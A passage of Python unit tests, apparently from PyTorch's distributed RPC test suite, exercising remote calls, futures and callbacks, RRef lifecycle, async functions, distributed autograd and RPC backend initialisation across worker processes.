with self.assertRaisesRegex(ValueError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_builtin(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, "size of tensor"):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_wait_all_exit_early_script_function(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
# We should receive the error from fut2
with self.assertRaisesRegex(RuntimeError, expected_err):
torch.futures.wait_all([fut1, fut2, fut3])
# Unblock RPC thread for fut1
RpcTest.timed_out_rpc_event.set()
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash,
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this nodes
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
AttributeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
# We have no guarantee that the add_done_callback fn will execute before the test finishes.
# Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with torch.autograd.profiler.profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class ProcessGroupAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# ProcessGroupRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `ProcessGroupRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.init_method
)
with self.assertLogs("torch.distributed.rpc", logging.WARNING) as cm:
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIn(
"To silence this warning pass `backend=BackendType.PROCESS_GROUP` explicitly.",
"\n".join(cm.output),
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.ProcessGroupAgent)
def test_logs_deprecation_warning(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=self.rpc_backend_options,
)
self.assertEqual(1, len(w))
self.assertIn(
"It is recommended to migrate to the TENSORPIPE backend.",
str(w[-1].message),
)
rpc.shutdown()
def test_single_threaded_rref_owner(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify if the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
# makes sure there is no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# using RRefs on dst
futs = []
for i in range(len(rrefs)):
futs.append(
rpc.rpc_async(dst, my_rref_function, args=(rrefs[i], rrefs[i]))
)
# wait for results and check
for i in range(len(futs)):
self.assertEqual(2 * (torch.zeros(2, 2) + i), futs[i].wait())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(futs), num_owner_rrefs)
# trigger RRef deletion
del futs
del rrefs
# wait until OwnerRRefs are cleared on dst
while num_owner_rrefs > 0:
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
time.sleep(0.01)
# use a barrier to prevent messages sent during shutdown occupies the
# only thread on callee (rank == 1) too early.
dist.barrier()
rpc.shutdown()
def test_single_threaded_rref_to_here(self):
# We need a process group in order to perform a barrier at the end.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# This test aims to verify if the server can handle all internal RPC
# messages using just one thread.
caller_rank = 0
callee_rank = 1
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_send_recv_threads=1
) if self.rank == callee_rank else self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
if self.rank == caller_rank:
dst = worker_name(callee_rank)
rrefs = []
# makes sure there is no existing OwnerRRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
self.assertEqual(0, int(info["num_owner_rrefs"]))
# creating RRefs on dst
for i in range(20):
rrefs.append(
rpc.remote(dst, delayed_add, args=(torch.zeros(2, 2), i))
)
# wait for results and check
for i in range(len(rrefs)):
self.assertEqual(torch.zeros(2, 2) + i, rrefs[i].to_here())
# check we created the expected number of RRefs on dst
info = rpc.rpc_sync(dst, get_rref_debug_info)
num_owner_rrefs = int(info["num_owner_rrefs"])
self.assertEqual(len(rrefs), num_owner_rrefs)
# trigger RRef deletion
del rrefs
# wait until OwnerRRefs are cleared on dst
